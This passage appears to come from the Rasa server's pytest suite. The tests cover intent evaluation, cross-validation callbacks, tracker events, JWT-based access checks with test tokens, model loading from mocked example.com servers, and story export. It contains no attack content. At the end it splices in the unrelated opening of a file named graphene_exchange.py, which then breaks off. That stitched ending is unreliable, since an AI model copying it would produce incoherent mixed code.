nlu_data = rasa.shared.utils.io.read_file("data/test/demo-rasa-small.json")
_, response = await rasa_app.post(
"/model/test/intents",
json=nlu_data,
headers={"Content-type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert set(response.json().keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
@pytest.mark.trains_model
async def test_evaluate_invalid_intent_model_file(rasa_app: SanicASGITestClient):
_, response = await rasa_app.post(
"/model/test/intents?model=invalid.tar.gz",
json={},
headers={"Content-type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.status == HTTPStatus.INTERNAL_SERVER_ERROR
@pytest.mark.trains_model
async def test_evaluate_intent_without_body(rasa_app: SanicASGITestClient):
_, response = await rasa_app.post(
"/model/test/intents", headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.BAD_REQUEST
@pytest.mark.trains_model
async def test_evaluate_intent_on_just_nlu_model(
rasa_app_nlu: SanicASGITestClient, default_nlu_data: Text
):
nlu_data = rasa.shared.utils.io.read_file(default_nlu_data)
_, response = await rasa_app_nlu.post(
"/model/test/intents",
data=nlu_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert set(response.json().keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
@pytest.mark.trains_model
async def test_evaluate_intent_with_model_param(
rasa_app: SanicASGITestClient, trained_nlu_model: Text, default_nlu_data: Text
):
_, response = await rasa_app.get("/status")
previous_model_file = response.json()["model_file"]
nlu_data = rasa.shared.utils.io.read_file(default_nlu_data)
_, response = await rasa_app.post(
f"/model/test/intents?model={trained_nlu_model}",
data=nlu_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert set(response.json().keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
_, response = await rasa_app.get("/status")
assert previous_model_file == response.json()["model_file"]
@pytest.mark.trains_model
async def test_evaluate_intent_with_model_server(
rasa_app: SanicASGITestClient,
trained_rasa_model: Text,
default_nlu_data: Text,
tear_down_scheduler: None,
):
production_model_server_url = (
"https://example.com/webhooks/actions?model=production"
)
test_model_server_url = "https://example.com/webhooks/actions?model=test"
nlu_data = rasa.shared.utils.io.read_file(default_nlu_data)
with aioresponses() as mocked:
# Mock retrieving the production model from the model server
mocked.get(
production_model_server_url,
body=Path(trained_rasa_model).read_bytes(),
headers={"ETag": "production"},
)
# Mock retrieving the test model from the model server
mocked.get(
test_model_server_url,
body=Path(trained_rasa_model).read_bytes(),
headers={"ETag": "test"},
)
agent_with_model_server = await load_agent(
model_server=EndpointConfig(production_model_server_url)
)
rasa_app.app.agent = agent_with_model_server
_, response = await rasa_app.post(
f"/model/test/intents?model={test_model_server_url}",
data=nlu_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert set(response.json().keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
production_model_server = rasa_app.app.agent.model_server
# Assert that the model server URL for the test didn't override the production
# model server URL
assert production_model_server.url == production_model_server_url
# Assert the tests didn't break pulling the models
assert production_model_server.kwargs.get("wait_time_between_pulls") != 0
@pytest.mark.trains_model
async def test_cross_validation(
rasa_app_nlu: SanicASGITestClient, default_nlu_data: Text
):
nlu_data = Path(default_nlu_data).read_text()
config = Path(DEFAULT_STACK_CONFIG).read_text()
payload = f"{nlu_data}\n{config}"
_, response = await rasa_app_nlu.post(
"/model/test/intents",
data=payload,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
params={"cross_validation_folds": 3},
)
assert response.status == HTTPStatus.OK
response_body = response.json()
for required_key in {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}:
assert required_key in response_body
details = response_body[required_key]
assert all(
key in details for key in ["precision", "f1_score", "report", "errors"]
)
@pytest.mark.trains_model
async def test_cross_validation_with_md(
rasa_app_nlu: SanicASGITestClient, default_nlu_data: Text
):
payload = """
## intent: greet
- Hi
- Hello
"""
_, response = await rasa_app_nlu.post(
"/model/test/intents", data=payload, params={"cross_validation_folds": 3},
)
assert response.status == HTTPStatus.BAD_REQUEST
@pytest.mark.trains_model
async def test_cross_validation_with_callback_success(
rasa_app_nlu: SanicASGITestClient, default_nlu_data: Text, monkeypatch: MonkeyPatch
):
nlu_data = Path(default_nlu_data).read_text()
config = Path(DEFAULT_STACK_CONFIG).read_text()
payload = f"{nlu_data}\n{config}"
callback_url = "https://example.com/webhooks/actions"
with aioresponses() as mocked:
mocked.post(callback_url, payload={})
mocked_cross_validation = Mock(
return_value=(
CVEvaluationResult({}, {}, {}),
CVEvaluationResult({}, {}, {}),
CVEvaluationResult({}, {}, {}),
)
)
monkeypatch.setattr(
rasa.nlu, rasa.nlu.cross_validate.__name__, mocked_cross_validation
)
_, response = await rasa_app_nlu.post(
"/model/test/intents",
data=payload,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
params={"cross_validation_folds": 3, "callback_url": callback_url},
)
assert response.status == HTTPStatus.NO_CONTENT
# Sleep to give event loop time to process things in the background
await asyncio.sleep(1)
mocked_cross_validation.assert_called_once()
last_request = latest_request(mocked, "POST", callback_url)
assert last_request
content = last_request[0].kwargs["data"]
response_body = json.loads(content)
for required_key in {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}:
assert required_key in response_body
details = response_body[required_key]
assert all(
key in details for key in ["precision", "f1_score", "report", "errors"]
)
@pytest.mark.trains_model
async def test_cross_validation_with_callback_error(
rasa_app_nlu: SanicASGITestClient, default_nlu_data: Text, monkeypatch: MonkeyPatch
):
nlu_data = Path(default_nlu_data).read_text()
config = Path(DEFAULT_STACK_CONFIG).read_text()
payload = f"{nlu_data}\n{config}"
monkeypatch.setattr(
rasa.nlu, rasa.nlu.cross_validate.__name__, Mock(side_effect=ValueError())
)
callback_url = "https://example.com/webhooks/actions"
with aioresponses() as mocked:
mocked.post(callback_url, payload={})
_, response = await rasa_app_nlu.post(
"/model/test/intents",
data=payload,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
params={"cross_validation_folds": 3, "callback_url": callback_url},
)
assert response.status == HTTPStatus.NO_CONTENT
await asyncio.sleep(1)
last_request = latest_request(mocked, "POST", callback_url)
assert last_request
content = last_request[0].kwargs["json"]
assert content["code"] == HTTPStatus.INTERNAL_SERVER_ERROR
@pytest.mark.trains_model
async def test_callback_unexpected_error(
rasa_app_nlu: SanicASGITestClient, default_nlu_data: Text, monkeypatch: MonkeyPatch
):
nlu_data = Path(default_nlu_data).read_text()
config = Path(DEFAULT_STACK_CONFIG).read_text()
payload = f"{nlu_data}\n{config}"
async def raiseUnexpectedError() -> NoReturn:
raise ValueError()
monkeypatch.setattr(
rasa.server,
rasa.server._training_payload_from_yaml.__name__,
Mock(side_effect=ValueError()),
)
callback_url = "https://example.com/webhooks/actions"
with aioresponses() as mocked:
mocked.post(callback_url, payload={})
_, response = await rasa_app_nlu.post(
"/model/test/intents",
data=payload,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
params={"cross_validation_folds": 3, "callback_url": callback_url},
)
assert response.status == HTTPStatus.NO_CONTENT
await asyncio.sleep(1)
last_request = latest_request(mocked, "POST", callback_url)
assert last_request
content = last_request[0].kwargs["json"]
assert content["code"] == HTTPStatus.INTERNAL_SERVER_ERROR
@pytest.mark.trains_model
async def test_predict(rasa_app: SanicASGITestClient):
data = {
"Events": {
"value": [
{"event": "action", "name": "action_listen"},
{
"event": "user",
"text": "hello",
"parse_data": {
"entities": [],
"intent": {"confidence": 0.57, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
},
]
}
}
_, response = await rasa_app.post(
"/model/predict",
json=data,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
content = response.json()
assert response.status == HTTPStatus.OK
assert "scores" in content
assert "tracker" in content
assert "policy" in content
@freeze_time("2018-01-01")
@pytest.mark.trains_model
async def test_requesting_non_existent_tracker(rasa_app: SanicASGITestClient):
_, response = await rasa_app.get("/conversations/madeupid/tracker")
content = response.json()
assert response.status == HTTPStatus.OK
assert content["paused"] is False
assert content["slots"] == {
"name": None,
REQUESTED_SLOT: None,
SESSION_START_METADATA_SLOT: None,
}
assert content["sender_id"] == "madeupid"
assert content["events"] == [
{
"event": "action",
"name": "action_session_start",
"policy": None,
"confidence": 1,
"timestamp": 1514764800,
"action_text": None,
},
{"event": "session_started", "timestamp": 1514764800},
{
"event": "action",
INTENT_NAME_KEY: "action_listen",
"policy": None,
"confidence": None,
"timestamp": 1514764800,
"action_text": None,
},
]
assert content["latest_message"] == {
"text": None,
"intent": {},
"entities": [],
"message_id": None,
"metadata": {},
}
@pytest.mark.parametrize("event", test_events)
@pytest.mark.trains_model
async def test_pushing_event(rasa_app: SanicASGITestClient, event: Event):
sender_id = str(uuid.uuid1())
conversation = f"/conversations/{sender_id}"
serialized_event = event.as_dict()
# Remove timestamp so that a new one is assigned on the server
serialized_event.pop("timestamp")
time_before_adding_events = time.time()
_, response = await rasa_app.post(
f"{conversation}/tracker/events",
json=serialized_event,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.json() is not None
assert response.status == HTTPStatus.OK
_, tracker_response = await rasa_app.get(f"/conversations/{sender_id}/tracker")
tracker = tracker_response.json()
assert tracker is not None
assert len(tracker.get("events")) == 4
deserialized_events = [Event.from_parameters(event) for event in tracker["events"]]
# there is an initial session start sequence at the beginning of the tracker
assert deserialized_events[:3] == session_start_sequence
assert deserialized_events[3] == event
assert deserialized_events[3].timestamp > time_before_adding_events
@pytest.mark.trains_model
async def test_push_multiple_events(rasa_app: SanicASGITestClient):
conversation_id = str(uuid.uuid1())
conversation = f"/conversations/{conversation_id}"
events = [e.as_dict() for e in test_events]
_, response = await rasa_app.post(
f"{conversation}/tracker/events",
json=events,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.json() is not None
assert response.status == HTTPStatus.OK
_, tracker_response = await rasa_app.get(
f"/conversations/{conversation_id}/tracker"
)
tracker = tracker_response.json()
assert tracker is not None
# there is an initial session start sequence at the beginning
assert [
Event.from_parameters(event) for event in tracker.get("events")
] == session_start_sequence + test_events
@pytest.mark.parametrize(
"params", ["?execute_side_effects=true&output_channel=callback", ""]
)
@pytest.mark.trains_model
async def test_pushing_event_while_executing_side_effects(
rasa_server: Sanic, params: Text
):
input_channel = CallbackInput(EndpointConfig("https://example.com/callback"))
channel.register([input_channel], rasa_server, "/webhooks/")
rasa_app = rasa_server.asgi_client
sender_id = str(uuid.uuid1())
conversation = f"/conversations/{sender_id}"
serialized_event = test_events[1].as_dict()
with aioresponses() as mocked:
mocked.post(
"https://example.com/callback",
repeat=True,
headers={"Content-Type": "application/json"},
)
await rasa_app.post(
f"{conversation}/tracker/events{params}",
json=serialized_event,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
r = latest_request(mocked, "post", "https://example.com/callback")
if not params:
assert r is None
else:
message_received = json_of_latest_request(r)
assert message_received.get("recipient_id") == sender_id
assert message_received.get("text") == serialized_event.get("text")
@pytest.mark.trains_model
async def test_post_conversation_id_with_slash(rasa_app: SanicASGITestClient):
conversation_id = str(uuid.uuid1())
id_len = len(conversation_id) // 2
conversation_id = conversation_id[:id_len] + "/+-_\\=" + conversation_id[id_len:]
conversation = f"/conversations/{conversation_id}"
events = [e.as_dict() for e in test_events]
_, response = await rasa_app.post(
f"{conversation}/tracker/events",
json=events,
headers={"Content-Type": "application/json"},
)
assert response.json() is not None
assert response.status == HTTPStatus.OK
_, tracker_response = await rasa_app.get(
f"/conversations/{conversation_id}/tracker"
)
tracker = tracker_response.json()
assert tracker is not None
# there is a session start sequence at the start
assert [
Event.from_parameters(event) for event in tracker.get("events")
] == session_start_sequence + test_events
@pytest.mark.trains_model
async def test_put_tracker(rasa_app: SanicASGITestClient):
data = [event.as_dict() for event in test_events]
_, response = await rasa_app.put(
"/conversations/pushtracker/tracker/events",
json=data,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
content = response.json()
assert response.status == HTTPStatus.OK
assert len(content["events"]) == len(test_events)
assert content["sender_id"] == "pushtracker"
_, tracker_response = await rasa_app.get("/conversations/pushtracker/tracker")
tracker = tracker_response.json()
assert tracker is not None
evts = tracker.get("events")
assert events.deserialise_events(evts) == test_events
@pytest.mark.trains_model
async def test_predict_without_conversation_id(rasa_app: SanicASGITestClient):
_, response = await rasa_app.post("/conversations/non_existent_id/predict")
assert response.status == HTTPStatus.NOT_FOUND
assert response.json()["message"] == "Conversation ID not found."
@pytest.mark.trains_model
async def test_sorted_predict(rasa_app: SanicASGITestClient):
await _create_tracker_for_sender(rasa_app, "sortedpredict")
_, response = await rasa_app.post("/conversations/sortedpredict/predict")
scores = response.json()["scores"]
sorted_scores = sorted(scores, key=lambda k: (-k["score"], k["action"]))
assert scores == sorted_scores
async def _create_tracker_for_sender(app: SanicASGITestClient, sender_id: Text) -> None:
data = [event.as_dict() for event in test_events[:3]]
_, response = await app.put(
f"/conversations/{sender_id}/tracker/events",
json=data,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
@pytest.mark.trains_model
async def test_get_tracker_with_jwt(rasa_secured_app: SanicASGITestClient):
# token generated with secret "core" and algorithm HS256
# on https://jwt.io/
# {"user": {"username": "testadmin", "role": "admin"}}
jwt_header = {
"Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
"eyJ1c2VyIjp7InVzZXJuYW1lIjoidGVzdGFkbWluIiwic"
"m9sZSI6ImFkbWluIn19.NAQr0kbtSrY7d28XTqRzawq2u"
"QRre7IWTuIDrCn5AIw"
}
_, response = await rasa_secured_app.get(
"/conversations/testadmin/tracker", headers=jwt_header
)
assert response.status == HTTPStatus.OK
_, response = await rasa_secured_app.get(
"/conversations/testuser/tracker", headers=jwt_header
)
assert response.status == HTTPStatus.OK
# {"user": {"username": "testuser", "role": "user"}}
jwt_header = {
"Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
"eyJ1c2VyIjp7InVzZXJuYW1lIjoidGVzdHVzZXIiLCJyb"
"2xlIjoidXNlciJ9fQ.JnMTLYd56qut2w9h7hRQlDm1n3l"
"HJHOxxC_w7TtwCrs"
}
_, response = await rasa_secured_app.get(
"/conversations/testadmin/tracker", headers=jwt_header
)
assert response.status == HTTPStatus.FORBIDDEN
_, response = await rasa_secured_app.get(
"/conversations/testuser/tracker", headers=jwt_header
)
assert response.status == HTTPStatus.OK
@pytest.mark.trains_model
def test_list_routes(default_agent: Agent):
app = rasa.server.create_app(default_agent, auth_token=None)
routes = utils.list_routes(app)
assert set(routes.keys()) == {
"hello",
"version",
"status",
"retrieve_tracker",
"append_events",
"replace_events",
"retrieve_story",
"execute_action",
"trigger_intent",
"predict",
"add_message",
"train",
"evaluate_stories",
"evaluate_intents",
"tracker_predict",
"parse",
"load_model",
"unload_model",
"get_domain",
}
@pytest.mark.trains_model
async def test_unload_model_error(rasa_app: SanicASGITestClient):
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.OK
assert "model_file" in response.json() and response.json()["model_file"] is not None
_, response = await rasa_app.delete("/model")
assert response.status == HTTPStatus.NO_CONTENT
@pytest.mark.trains_model
async def test_get_domain(rasa_app: SanicASGITestClient):
_, response = await rasa_app.get(
"/domain", headers={"accept": rasa.server.JSON_CONTENT_TYPE}
)
content = response.json()
assert response.status == HTTPStatus.OK
assert "config" in content
assert "intents" in content
assert "entities" in content
assert "slots" in content
assert "responses" in content
assert "actions" in content
@pytest.mark.trains_model
async def test_get_domain_invalid_accept_header(rasa_app: SanicASGITestClient):
_, response = await rasa_app.get("/domain")
assert response.status == HTTPStatus.NOT_ACCEPTABLE
@pytest.mark.trains_model
async def test_load_model(rasa_app: SanicASGITestClient, trained_core_model: Text):
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json()
old_fingerprint = response.json()["fingerprint"]
data = {"model_file": trained_core_model}
_, response = await rasa_app.put("/model", json=data)
assert response.status == HTTPStatus.NO_CONTENT
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json()
assert old_fingerprint != response.json()["fingerprint"]
@pytest.mark.trains_model
async def test_load_model_from_model_server(
rasa_app: SanicASGITestClient, trained_core_model: Text, tear_down_scheduler: None
):
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json()
old_fingerprint = response.json()["fingerprint"]
endpoint = EndpointConfig("https://example.com/model/trained_core_model")
with open(trained_core_model, "rb") as f:
with aioresponses(passthrough=["http://127.0.0.1"]) as mocked:
headers = {}
fs = os.fstat(f.fileno())
headers["Content-Length"] = str(fs[6])
mocked.get(
"https://example.com/model/trained_core_model",
content_type="application/x-tar",
body=f.read(),
)
data = {"model_server": {"url": endpoint.url}}
_, response = await rasa_app.put("/model", json=data)
assert response.status == HTTPStatus.NO_CONTENT
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json()
assert old_fingerprint != response.json()["fingerprint"]
@pytest.mark.trains_model
async def test_load_model_invalid_request_body(rasa_app: SanicASGITestClient):
_, response = await rasa_app.put("/model")
assert response.status == HTTPStatus.BAD_REQUEST
@pytest.mark.trains_model
async def test_load_model_invalid_configuration(rasa_app: SanicASGITestClient):
data = {"model_file": "some-random-path"}
_, response = await rasa_app.put("/model", json=data)
assert response.status == HTTPStatus.BAD_REQUEST
@pytest.mark.trains_model
async def test_execute(rasa_app: SanicASGITestClient):
await _create_tracker_for_sender(rasa_app, "test_execute")
data = {INTENT_NAME_KEY: "utter_greet"}
_, response = await rasa_app.post("/conversations/test_execute/execute", json=data)
assert response.status == HTTPStatus.OK
parsed_content = response.json()
assert parsed_content["tracker"]
assert parsed_content["messages"]
@pytest.mark.trains_model
async def test_execute_without_conversation_id(rasa_app: SanicASGITestClient):
data = {INTENT_NAME_KEY: "utter_greet"}
_, response = await rasa_app.post(
"/conversations/non_existent_id/execute", json=data
)
assert response.status == HTTPStatus.NOT_FOUND
assert response.json()["message"] == "Conversation ID not found."
@pytest.mark.trains_model
async def test_execute_with_missing_action_name(rasa_app: SanicASGITestClient):
test_sender = "test_execute_with_missing_action_name"
await _create_tracker_for_sender(rasa_app, test_sender)
data = {"wrong-key": "utter_greet"}
_, response = await rasa_app.post(
f"/conversations/{test_sender}/execute", json=data
)
assert response.status == HTTPStatus.BAD_REQUEST
@pytest.mark.trains_model
async def test_execute_with_not_existing_action(rasa_app: SanicASGITestClient):
test_sender = "test_execute_with_not_existing_action"
await _create_tracker_for_sender(rasa_app, test_sender)
data = {"name": "ka[pa[opi[opj[oj[oija"}
_, response = await rasa_app.post(
f"/conversations/{test_sender}/execute", json=data
)
assert response.status == HTTPStatus.INTERNAL_SERVER_ERROR
@pytest.mark.trains_model
async def test_trigger_intent(rasa_app: SanicASGITestClient):
data = {INTENT_NAME_KEY: "greet"}
_, response = await rasa_app.post(
"/conversations/test_trigger/trigger_intent", json=data
)
assert response.status == HTTPStatus.OK
parsed_content = response.json()
assert parsed_content["tracker"]
assert parsed_content["messages"]
@pytest.mark.trains_model
async def test_trigger_intent_with_entity(rasa_app: SanicASGITestClient):
entity_name = "name"
entity_value = "Sara"
data = {INTENT_NAME_KEY: "greet", "entities": {entity_name: entity_value}}
_, response = await rasa_app.post(
"/conversations/test_trigger/trigger_intent", json=data
)
assert response.status == HTTPStatus.OK
parsed_content = response.json()
last_slot_set_event = [
event
for event in parsed_content["tracker"]["events"]
if event["event"] == "slot"
][-1]
assert parsed_content["tracker"]
assert parsed_content["messages"]
assert last_slot_set_event["name"] == entity_name
assert last_slot_set_event["value"] == entity_value
@pytest.mark.trains_model
async def test_trigger_intent_with_missing_intent_name(rasa_app: SanicASGITestClient):
test_sender = "test_trigger_intent_with_missing_action_name"
data = {"wrong-key": "greet"}
_, response = await rasa_app.post(
f"/conversations/{test_sender}/trigger_intent", json=data
)
assert response.status == HTTPStatus.BAD_REQUEST
@pytest.mark.trains_model
async def test_trigger_intent_with_not_existing_intent(rasa_app: SanicASGITestClient):
test_sender = "test_trigger_intent_with_not_existing_intent"
await _create_tracker_for_sender(rasa_app, test_sender)
data = {INTENT_NAME_KEY: "ka[pa[opi[opj[oj[oija"}
_, response = await rasa_app.post(
f"/conversations/{test_sender}/trigger_intent", json=data
)
assert response.status == HTTPStatus.NOT_FOUND
@pytest.mark.parametrize(
"input_channels, output_channel_to_use, expected_channel",
[
(None, "slack", CollectingOutputChannel),
([], None, CollectingOutputChannel),
([RestInput()], "slack", CollectingOutputChannel),
([RestInput()], "rest", CollectingOutputChannel),
(
[RestInput(), SlackInput("test", slack_signing_secret="foobar")],
"slack",
SlackBot,
),
],
)
def test_get_output_channel(
input_channels: List[Text], output_channel_to_use: Text, expected_channel: Type
):
request = MagicMock()
app = MagicMock()
app.input_channels = input_channels
request.app = app
request.args = {"output_channel": output_channel_to_use}
actual = rasa.server._get_output_channel(request, None)
assert isinstance(actual, expected_channel)
@pytest.mark.parametrize(
"input_channels, expected_channel",
[
([], CollectingOutputChannel),
([RestInput()], CollectingOutputChannel),
([RestInput(), SlackInput("test", slack_signing_secret="foobar")], SlackBot),
],
)
def test_get_latest_output_channel(input_channels: List[Text], expected_channel: Type):
request = MagicMock()
app = MagicMock()
app.input_channels = input_channels
request.app = app
request.args = {"output_channel": "latest"}
tracker = DialogueStateTracker.from_events(
"default", [UserUttered("text", input_channel="slack")]
)
actual = rasa.server._get_output_channel(request, tracker)
assert isinstance(actual, expected_channel)
def test_app_when_app_has_no_input_channels():
request = MagicMock()
class NoInputChannels:
pass
request.app = NoInputChannels()
actual = rasa.server._get_output_channel(
request, DialogueStateTracker.from_events("default", [])
)
assert isinstance(actual, CollectingOutputChannel)
@pytest.mark.parametrize(
"conversation_events,until_time,fetch_all_sessions,expected",
# conversation with one session
[
(
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("hi", {"name": "greet"}),
ActionExecuted("utter_greet"),
],
None,
True,
"""version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: greet
user: |-
hi
- action: utter_greet""",
),
# conversation with multiple sessions
(
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("hi", {"name": "greet"}),
ActionExecuted("utter_greet"),
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("bye bye", {"name": "goodbye"}),
ActionExecuted("utter_goodbye"),
],
None,
True,
"""version: "2.0"
stories:
- story: some-conversation-ID, story 1
steps:
- intent: greet
user: |-
hi
- action: utter_greet
- story: some-conversation-ID, story 2
steps:
- intent: goodbye
user: |-
bye bye
- action: utter_goodbye""",
),
# conversation with multiple sessions, but setting `all_sessions=false`
# means only the last one is returned
(
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("hi", {"name": "greet"}),
ActionExecuted("utter_greet"),
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("bye bye", {"name": "goodbye"}),
ActionExecuted("utter_goodbye"),
],
None,
False,
"""version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: goodbye
user: |-
bye bye
- action: utter_goodbye""",
),
# the default for `all_sessions` is `false` - this test checks that
# only the latest session is returned in that case
(
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("hi", {"name": "greet"}),
ActionExecuted("utter_greet"),
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("bye bye", {"name": "goodbye"}),
ActionExecuted("utter_goodbye"),
],
None,
None,
"""version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: goodbye
user: |-
bye bye
- action: utter_goodbye""",
),
# `until` parameter means only the first session is returned
(
[
ActionExecuted(ACTION_SESSION_START_NAME, timestamp=1),
SessionStarted(timestamp=2),
UserUttered("hi", {"name": "greet"}, timestamp=3),
ActionExecuted("utter_greet", timestamp=4),
ActionExecuted(ACTION_SESSION_START_NAME, timestamp=5),
SessionStarted(timestamp=6),
UserUttered("bye bye", {"name": "goodbye"}, timestamp=7),
ActionExecuted("utter_goodbye", timestamp=8),
],
4,
True,
"""version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: greet
user: |-
hi
- action: utter_greet""",
),
# empty conversation
([], None, True, 'version: "2.0"'),
# Conversation with slot
(
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("hi", {"name": "greet"}),
ActionExecuted("utter_greet"),
SlotSet(REQUESTED_SLOT, "some value"),
],
None,
True,
"""version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: greet
user: |-
hi
- action: utter_greet
- slot_was_set:
- requested_slot: some value""",
),
],
)
@pytest.mark.trains_model
async def test_get_story(
rasa_app: SanicASGITestClient,
monkeypatch: MonkeyPatch,
conversation_events: List[Event],
until_time: Optional[float],
fetch_all_sessions: Optional[bool],
expected: Text,
):
conversation_id = "some-conversation-ID"
tracker_store = InMemoryTrackerStore(Domain.empty())
tracker = DialogueStateTracker.from_events(conversation_id, conversation_events)
tracker_store.save(tracker)
monkeypatch.setattr(rasa_app.app.agent, "tracker_store", tracker_store)
url = f"/conversations/{conversation_id}/story?"
query = {}
if fetch_all_sessions is not None:
query["all_sessions"] = fetch_all_sessions
if until_time is not None:
query["until"] = until_time
_, response = await rasa_app.get(url + urllib.parse.urlencode(query))
assert response.status == HTTPStatus.OK
assert response.content.decode().strip() == expected
@pytest.mark.trains_model
async def test_get_story_without_conversation_id(
rasa_app: SanicASGITestClient, monkeypatch: MonkeyPatch
):
conversation_id = "some-conversation-ID"
url = f"/conversations/{conversation_id}/story"
_, response = await rasa_app.get(url)
assert response.status == HTTPStatus.NOT_FOUND
assert response.json()["message"] == "Conversation ID not found."
@pytest.mark.trains_model
async def test_get_story_does_not_update_conversation_session(
rasa_app: SanicASGITestClient, monkeypatch: MonkeyPatch
):
conversation_id = "some-conversation-ID"
# domain with short session expiration time of one second
domain = Domain.empty()
domain.session_config = SessionConfig(
session_expiration_time=1 / 60, carry_over_slots=True
)
monkeypatch.setattr(rasa_app.app.agent, "domain", domain)
# conversation contains one session that has expired
now = time.time()
conversation_events = [
ActionExecuted(ACTION_SESSION_START_NAME, timestamp=now - 10),
SessionStarted(timestamp=now - 9),
UserUttered("hi", {"name": "greet"}, timestamp=now - 8),
ActionExecuted("utter_greet", timestamp=now - 7),
]
tracker = DialogueStateTracker.from_events(conversation_id, conversation_events)
# the conversation session has expired
assert rasa_app.app.agent.create_processor()._has_session_expired(tracker)
tracker_store = InMemoryTrackerStore(domain)
tracker_store.save(tracker)
monkeypatch.setattr(rasa_app.app.agent, "tracker_store", tracker_store)
_, response = await rasa_app.get(f"/conversations/{conversation_id}/story")
assert response.status == HTTPStatus.OK
# expected story is returned
assert (
response.content.decode().strip()
== """version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: greet
user: |-
hi
- action: utter_greet"""
)
# the tracker has the same number of events as were initially added
assert len(tracker.events) == len(conversation_events)
# the last event is still the same as before
assert tracker.events[-1].timestamp == conversation_events[-1].timestamp
@pytest.mark.parametrize(
"initial_tracker_events,events_to_append,expected_events",
[
(
# the tracker is initially empty, and no events are appended
# so we'll just expect the session start sequence with an `action_listen`
[],
[],
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
ActionExecuted(ACTION_LISTEN_NAME),
],
),
(
# the tracker is initially empty, and a user utterance is appended
# we expect a tracker with a session start sequence and a user utterance
[],
[UserUttered("/greet", {"name": "greet", "confidence": 1.0})],
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
ActionExecuted(ACTION_LISTEN_NAME),
UserUttered("/greet", {"name": "greet", "confidence": 1.0}),
],
),
(
# the tracker is initially empty, and a session start sequence is appended
# we'll just expect the session start sequence
[],
[ActionExecuted(ACTION_SESSION_START_NAME), SessionStarted()],
[ActionExecuted(ACTION_SESSION_START_NAME), SessionStarted()],
),
(
# the tracker already contains some events - we can simply append events
[
ActionExecuted(ACTION_LISTEN_NAME),
UserUttered("/greet", {"name": "greet", "confidence": 1.0}),
],
[ActionExecuted("utter_greet")],
[
ActionExecuted(ACTION_LISTEN_NAME),
UserUttered("/greet", {"name": "greet", "confidence": 1.0}),
ActionExecuted("utter_greet"),
],
),
],
)
@pytest.mark.trains_model
async def test_update_conversation_with_events(
rasa_app: SanicASGITestClient,
monkeypatch: MonkeyPatch,
initial_tracker_events: List[Event],
events_to_append: List[Event],
expected_events: List[Event],
):
conversation_id = "some-conversation-ID"
domain = Domain.empty()
tracker_store = InMemoryTrackerStore(domain)
monkeypatch.setattr(rasa_app.app.agent, "tracker_store", tracker_store)
if initial_tracker_events:
tracker = DialogueStateTracker.from_events(
conversation_id, initial_tracker_events
)
tracker_store.save(tracker)
fetched_tracker = await rasa.server.update_conversation_with_events(
conversation_id, rasa_app.app.agent.create_processor(), domain, events_to_append
)
assert list(fetched_tracker.events) == expected_events
|
graphene_exchange.py | # DISABLE SELECT PYLINT TESTS
# pylint: disable=bad-continuation, broad-except, no-member, too-many-lines
# pylint: disable=no-name-in-module, too-many-arguments, too-many-public-methods
# pylint: disable=too-many-locals, too-many-instance-attributes, import-error
# pylint: disable=too-many-statements, useless-super-delegation
# pylint: disable=too-many-instance-attributes,
"""
╔════════════════════════════════════════════════════╗
